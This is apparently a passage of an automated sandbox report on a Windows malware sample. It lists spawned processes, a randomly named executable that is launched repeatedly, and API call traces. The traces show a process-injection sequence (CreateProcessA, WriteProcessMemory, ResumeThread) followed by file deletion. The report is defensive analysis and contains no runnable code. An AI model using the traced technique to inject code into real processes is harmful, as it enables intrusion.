                                                                                                                                                                        Imagebase:0x7ff794e20000
                                                                                                                                                                        File size:19'232 bytes
                                                                                                                                                                        MD5 hash:F050189D49E17D0D340DE52E9E5B711F
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Target ID:22
                                                                                                                                                                        Start time:00:41:30
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                        Imagebase:0x7ff71e800000
                                                                                                                                                                        File size:103'288 bytes
                                                                                                                                                                        MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:23
                                                                                                                                                                        Start time:00:41:31
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:0x7ff71e800000
File size:103'288 bytes
MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:00:41:31
Start date:19/12/2023
Path:C:\Windows\System32\ApplicationFrameHost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\ApplicationFrameHost.exe -Embedding
Imagebase:0x7ff7d5d50000
File size:78'456 bytes
MD5 hash:D58A8A987A8DAFAD9DC32A548CC061E7
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:25
Start time:00:41:32
Start date:19/12/2023
Path:C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca
Imagebase:0x7ff63cc40000
File size:19'456 bytes
MD5 hash:6C44453CD661FC2DB18E4C09C4940399
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:26
Start time:00:41:33
Start date:19/12/2023
Path:C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:0x7ff71e800000
File size:103'288 bytes
MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:27
Start time:00:41:33
Start date:19/12/2023
Path:C:\Windows\ImmersiveControlPanel\SystemSettings.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
Imagebase:0x7ff614e70000
File size:98'104 bytes
MD5 hash:3CD3CD85226FCF576DFE9B70B6DA2630
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:28
Start time:00:41:38
Start date:19/12/2023
Path:C:\Windows\System32\oobe\UserOOBEBroker.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
Imagebase:0x7ff69a060000
File size:57'856 bytes
MD5 hash:BCE744909EB87F293A85830D02B3D6EB
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:29
Start time:00:41:38
Start date:19/12/2023
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Imagebase:0x7ff6eef20000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:30
Start time:00:41:38
Start date:19/12/2023
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0x4
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:31
Start time:00:41:39
Start date:19/12/2023
Path:C:\Windows\System32\dllhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
Imagebase:0x7ff70f330000
File size:21'312 bytes
MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:32
Start time:00:41:39
Start date:19/12/2023
Path:C:\Windows\System32\backgroundTaskHost.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX4325622ft6437f3xfywcfxgbedfvpn0x.mca
Imagebase:0x7ff6ec4b0000
File size:19'776 bytes
MD5 hash:DA7063B17DBB8BBB3015351016868006
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:33
Start time:00:41:40
Start date:19/12/2023
Path:C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:0x7ff71e800000
File size:103'288 bytes
MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:34
Start time:00:41:40
Start date:19/12/2023
Path:C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:0x7ff71e800000
File size:103'288 bytes
MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:35
Start time:00:41:41
Start date:19/12/2023
Path:C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe"
Imagebase:0x510000
File size:140'800 bytes
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:36
Start time:00:41:41
Start date:19/12/2023
Path:C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe"
Imagebase:0x510000
File size:140'800 bytes
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:37
Start time:00:41:41
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe"
                                                                                                                                                                        Imagebase:0x510000
                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Target ID:38
                                                                                                                                                                        Start time:00:41:42
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe"
                                                                                                                                                                        Imagebase:0x510000
                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Target ID:39
                                                                                                                                                                        Start time:00:41:42
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe"
                                                                                                                                                                        Imagebase:0x510000
                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Target ID:40
                                                                                                                                                                        Start time:00:41:42
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe"
                                                                                                                                                                        Imagebase:0x510000
                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Target ID:41
                                                                                                                                                                        Start time:00:41:42
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe"
                                                                                                                                                                        Imagebase:0x510000
                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Target ID:42
                                                                                                                                                                        Start time:00:41:43
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe"
                                                                                                                                                                        Imagebase:0x510000
                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Target ID:43
                                                                                                                                                                        Start time:00:41:43
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe"
                                                                                                                                                                        Imagebase:0x510000
                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Target ID:44
                                                                                                                                                                        Start time:00:41:43
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe"
                                                                                                                                                                        Imagebase:0x510000
                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false


                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:9.9%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                          Signature Coverage:10.6%
                                                                                                                                                                          Total number of Nodes:208
                                                                                                                                                                          Total number of Limit Nodes:7

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 23 401000-401009 24 40100c-401018 23->24 24->24 25 40101a-40102c 24->25 26 40102e-40103d 25->26 26->26 27 40103f-401043 26->27 27->26 28 401045-40106e VirtualAlloc call 401075 27->28 30 401073 28->30 30->30
APIs
• VirtualAlloc.KERNELBASE(00000000,00A00000,00003000,00000040), ref: 00401064
Strings
Memory Dump Source
• Source File: 00000000.00000002.1731690565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1731673500.0000000000400000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_java.jbxd
Similarity
• API ID: AllocVirtual
• String ID: alAl
• API String ID: 4275171209-1316302345
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0222098B: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 022209A5
  • Part of subcall function 0222098B: GetStartupInfoA.KERNEL32(00000000), ref: 022209BD
• ExitProcess.KERNEL32(00000000), ref: 0222001D
Memory Dump Source
• Source File: 00000000.00000002.1731963218.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2220000_java.jbxd
Similarity
• API ID: ExitInfoMutexOpenProcessStartup
• String ID:
• API String ID: 213680645-0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1731777557.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4d0000_java.jbxd
Similarity
• API ID: ProtectVirtual
• String ID: $1;$@$C[$R$d:$wJ$y7$v
• API String ID: 544645111-3459585926
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• CreateProcessA.KERNELBASE(00000000,022209F6,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 02220A04
• Wow64GetThreadContext.KERNEL32(?,00000000), ref: 02220A2C
• VirtualProtectEx.KERNELBASE(?,?,000000EB,00000040,00000000), ref: 02220A57
• DuplicateHandle.KERNELBASE(000000FF,000000FF,?,02225834,00000000,00000000,00000002), ref: 02220A9C
• WriteProcessMemory.KERNELBASE(?,?,?,000000EB,00000000), ref: 02220ACA
• ResumeThread.KERNELBASE(?), ref: 02220ADA
• Sleep.KERNELBASE(000003E8), ref: 02220AEA
• OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 02220B01
Memory Dump Source
• Source File: 00000000.00000002.1731963218.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2220000_java.jbxd
Similarity
• API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWow64Write
• String ID:
• API String ID: 1738979855-0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
APIs
• GetVolumeInformationA.KERNELBASE(02223405,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000104), ref: 02223409
Memory Dump Source
• Source File: 00000000.00000002.1731963218.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2220000_java.jbxd
Similarity
• API ID: InformationVolume
• String ID:
• API String ID: 2039140958-0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1731963218.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2220000_java.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1731963218.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2220000_java.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1731963218.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2220000_java.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• LoadLibraryA.KERNEL32(02222949,00000008,?,00000000,02222835,00000000), ref: 02222956
• VirtualAlloc.KERNEL32(00000000,01400000,00003000,00000004), ref: 02222993
• lstrcat.KERNEL32(00000000,022229C1), ref: 022229D0
• lstrcat.KERNEL32(00000000,022229F8), ref: 02222A07
• lstrcat.KERNEL32(00000000,02222A2F), ref: 02222A3E
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02222AB8
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02222AFC
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02222B52
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02222B66
Memory Dump Source
• Source File: 00000000.00000002.1731963218.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2220000_java.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFilelstrcat$AllocLibraryLoadSleepVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 675344582-0
                                                                                                                                                                          • Opcode ID: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                          • Instruction ID: 2427c2239a895d8b035d21594502a8224baea8e2e08237041f70d4cff934cd15
                                                                                                                                                                          • Opcode Fuzzy Hash: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                          • Instruction Fuzzy Hash: 23517272410324FEDB22AFB08C48FBB77ADEF40704F440595AE45EA059DA379688CEA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,022229C1), ref: 022229D0
                                                                                                                                                                            • Part of subcall function 02222A01: lstrcat.KERNEL32(00000000,022229F8), ref: 02222A07
                                                                                                                                                                            • Part of subcall function 02222A01: lstrcat.KERNEL32(00000000,02222A2F), ref: 02222A3E
                                                                                                                                                                            • Part of subcall function 02222A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02222AB8
                                                                                                                                                                            • Part of subcall function 02222A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02222AFC
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02222B52
                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02222B66
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1731963218.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2220000_java.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFilelstrcat$Sleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 588723932-0
                                                                                                                                                                          • Opcode ID: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                          • Instruction ID: b401efba0d7517ca2d7ebc34caba8fc9137897f10b68fa2c0d18b33c7655c636
                                                                                                                                                                          • Opcode Fuzzy Hash: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                          • Instruction Fuzzy Hash: F5413571410334FEDB22AFB08D48FAB76BDFF40704F404595AE45EA059DA379688CEA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

APIs
• lstrcat.KERNEL32(00000000,022229F8), ref: 02222A07
  • Part of subcall function 02222A38: lstrcat.KERNEL32(00000000,02222A2F), ref: 02222A3E
  • Part of subcall function 02222A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02222AB8
  • Part of subcall function 02222A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02222AFC
  • Part of subcall function 02222A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02222B52
  • Part of subcall function 02222A38: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02222B66
Memory Dump Source
• Source File: 00000000.00000002.1731963218.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2220000_java.jbxd
Similarity
• API ID: DeleteFile$lstrcat$Sleep
• String ID:
• API String ID: 4261675396-0
• Opcode ID: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
• Instruction ID: 17d089ca0b4e70fdaeb14ece6449512be2b7796a19621dff44204cea98d145bd
• Opcode Fuzzy Hash: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
• Instruction Fuzzy Hash: C0412671410334FEDB22AFB08D48FAB76BDFF40705F404595AE45EA058DA379688CEA0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• lstrcat.KERNEL32(00000000,02222A2F), ref: 02222A3E
  • Part of subcall function 02222B71: Sleep.KERNEL32(00000001,?,452F5000,00000020), ref: 02222C68
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02222AB8
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02222AFC
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02222B52
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02222B66
Memory Dump Source
• Source File: 00000000.00000002.1731963218.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2220000_java.jbxd
Similarity
• API ID: DeleteFile$Sleep$lstrcat
• String ID:
• API String ID: 531250245-0
• Opcode ID: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
• Instruction ID: ec3373aa2e6459d79794d0ade7b6bb596e71d27d6e105a2a61b6ffdb88c7402d
• Opcode Fuzzy Hash: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
• Instruction Fuzzy Hash: 32311471510278FEDB226EB08D48FAB76BCFF40709F4045A5AE45E6058DA379688CEA0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• lstrcat.KERNEL32(00000000,00000000), ref: 0222320E
• GetStartupInfoA.KERNEL32(00000000), ref: 0222324C
• CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,022231D9,00000011,?,00000000,00000000), ref: 02223279
• CloseHandle.KERNEL32(?,?,022231D9,00000011,?,00000000,00000000,00000000,02223092,00000004,00000000), ref: 02223285
• CloseHandle.KERNEL32(?,?,022231D9,00000011,?,00000000,00000000,00000000,02223092,00000004,00000000), ref: 02223291
Memory Dump Source
• Source File: 00000000.00000002.1731963218.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2220000_java.jbxd
Similarity
• API ID: CloseHandle$CreateInfoProcessStartuplstrcat
• String ID:
• API String ID: 3387338972-0
• Opcode ID: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
• Instruction ID: e66513f883e40e7130df8de76f2ca85639338634a9e547b9cec1badff5e3bea7
• Opcode Fuzzy Hash: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
• Instruction Fuzzy Hash: 55115472410628AFDF12AFA0CC48AEFB3FDEF40305F014595E985EA008DA365A84CEA1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(00000000,00000000,?,02223F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 02223F51
• Sleep.KERNEL32(000003E8,00000000,?,02223F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 02223F6F
• Sleep.KERNEL32(000007D0), ref: 02223F7F
• Sleep.KERNEL32(00000BB8), ref: 02223F8F
Memory Dump Source
• Source File: 00000000.00000002.1731963218.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2220000_java.jbxd
Similarity
• API ID: Sleep$HandleModule
• String ID:
• API String ID: 3646095425-0
• Opcode ID: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
• Instruction ID: 99fc45ef342004446b545e3e3666aca3e85716af4b2dfe20613f2248af36f115
• Opcode Fuzzy Hash: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
• Instruction Fuzzy Hash: ADF01270564360FAFF50FFF0AC4C6593AB99F00704F0404D0A949AD09DCF7A81588E75
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 18.9%
Dynamic/Decrypted Code Coverage: 99.8%
Signature Coverage: 4.1%
Total number of Nodes: 614
Total number of Limit Nodes: 10

Control-flow Graph

• Executed
